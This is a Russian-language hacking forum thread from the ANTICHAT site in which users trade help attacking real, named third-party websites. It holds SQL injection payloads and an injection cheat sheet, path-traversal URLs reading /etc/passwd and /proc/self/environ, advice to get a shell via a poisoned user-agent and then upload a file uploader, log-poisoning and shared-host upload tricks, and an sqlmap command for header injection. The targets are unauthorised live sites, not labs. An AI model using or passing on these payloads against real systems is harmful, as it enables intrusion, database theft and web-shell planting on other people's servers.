ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.05.2015, 19:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
|
|
|
|
29.05.2015, 00:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Запрос
Код:
Code:
union+select+count(table_name),2,3,4,5+from+information_schema.tables+limit+0,1+--+
выдает 188 колонок. Однако при просмотре после limit 44,1 , выдается пустое поле. Обрывается все на букве "b", так что думаю что там на самом деле имеется много полей. С чем может быть связано данное явление? |
|
|
|
29.05.2015, 01:03
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Код:
Code:
https://www.danscomp.com/showfullimage.php?type=products&image=kkk'and(extractvalue(1,repeat(version(),2)))='1
дальше будет сложнее, много всего фильтруется.
Сообщение от Br@!ns
Br@!ns said:
↑
Запрос
Код:
Code:
union+select+count(table_name),2,3,4,5+from+information_schema.tables+limit+0,1+--+
выдает 188 колонок. Однако при просмотре после limit 44,1 , выдается пустое поле. Обрывается все на букве "b", так что думаю что там на самом деле имеется много полей. С чем может быть связано данное явление? ничего не понял. давайте линк, посмотрю
можно бы было, если бы кавычки не экранировались:
Код:
Code:
http://www.inkaddict.com/search.php?query=lol
|
|
|
29.05.2015, 10:55
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от huntercs16
huntercs16 said:
↑
Код:
Code:
http://pelczar.rzeszow.pl/duszpasterstwoszpitala/index.php?action=aktualnosci/../../../../../../../../../../../../../../../proc/self/environ/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
Тоже енвайрон. Что сделать можно?
В данном случае base64 не помог видим, что в ответе есть строка с user-agent. смотрим phpinfo():
allow url open on
вставляем строку
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
получаем шелл. для начала можно залить простой аплоадер
|
|
|
|
29.05.2015, 20:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Здравствуйте. Дайте пожалуйста подсказку как раскручивать такие инъекции
Код HTML:
HTML:
http://emofans.ru/gallery/emowallp
пост данные
[PHP]
PHP:
[COLOR="#000000"] foto_msort=&foto_sort[COLOR="#007700"]= |
|
|
|
29.05.2015, 21:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
56887
Репутация:
28
|
|
[QUOTE="BabaDook"]
BabaDook said:
↑
Здравствуйте. Дайте пожалуйста подсказку как раскручивать такие инъекции
Код HTML:
HTML:
http://emofans.ru/gallery/emowallp
пост данные
[PHP]
PHP:
[COLOR="#000000"] foto_msort=&foto_sort[COLOR="#007700"]=
вот такими способами не пробовал ?
Код:
Code:
нъекция после order by
Слепая (more than 1 row)
script.php?par=(select if(substring(version(),1,1)=4,1,(select 1 union select 2)))
В ошибке
(ExtractValue)
script.php?par=id,ExtractValue(1,concat(0x5c,(sele ct table_name from information_schema.tables limit 1)))--
(rand)
script.php?par=(select 1 from (select count(0),concat((select version()),floor(rand(0)*2)) from information_schema.tables group by 2 limit 1)a)--
(name_const)
script.php?par=(select*from(select name_const(version(),1),name_const(version(),1))a)
копипаста с
https://rdot.org/forum/showthread.php?t=60
|
|
|
|
31.05.2015, 20:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
35200
Репутация:
6
|
|
Ребята, есть LFI на сайте
Код:
Code:
http://alltrim.com.pl/technologie.php?cont=../../../../../../../../../../../../../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
еррор лог лежит тут: ../../../../../../../../../../../../var/log/httpd/error_log
Но он не содержит referer.
Что нибудь можно сделать? |
|
|
|
31.05.2015, 23:46
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от huntercs16
huntercs16 said:
↑
Ребята, есть LFI на сайте
Код:
Code:
http://alltrim.com.pl/technologie.php?cont=../../../../../../../../../../../../../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
еррор лог лежит тут: ../../../../../../../../../../../../var/log/httpd/error_log
Но он не содержит referer.
Что нибудь можно сделать? да не, с инклудом варианты всегда есть:
1. понять, откуда пишутся логи в еррор_лог, отправить запрос
Код:
Code:
GET /index.php/ HTTP/1.0
или с некорректным методом.
2. у вас огромный список сайтов на этом хосте ( http://devel.wtf/reverse/alltrim.com.pl) ищите тот, где доступна заливка файлов и инклудте
например, http://agzeta.pl/index.php/forum/profile/personality
|
|
|
|
01.06.2015, 15:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
5818
Репутация:
0
|
|
имею ссылку вида
https://site.net/desktop/index.php
акунетикс показывает
X-Forwarded-For: 1'"
и получается You have an error in your SQL syntax
как это дело заюзать в sqlmap? |
|
|
|
01.06.2015, 15:11
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от reuvenmatbil
reuvenmatbil said:
↑
имею ссылку вида
https://site.net/desktop/index.php
акунетикс показывает
X-Forwarded-For: 1'"
и получается You have an error in your SQL syntax
как это дело заюзать в sqlmap? не уверен, но попробуйте так:
Код:
Code:
sqlmap -u "http://site.net/desktop/index.php" --headers="X-Forwarded-For: *" --dbs
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
